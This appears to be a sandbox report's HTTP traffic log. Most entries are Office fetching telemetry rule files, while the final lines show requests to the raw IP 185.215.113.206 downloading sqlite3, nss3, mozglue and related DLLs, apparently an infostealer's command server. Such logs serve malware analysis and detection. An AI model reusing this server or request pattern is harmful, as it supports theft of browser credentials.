Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
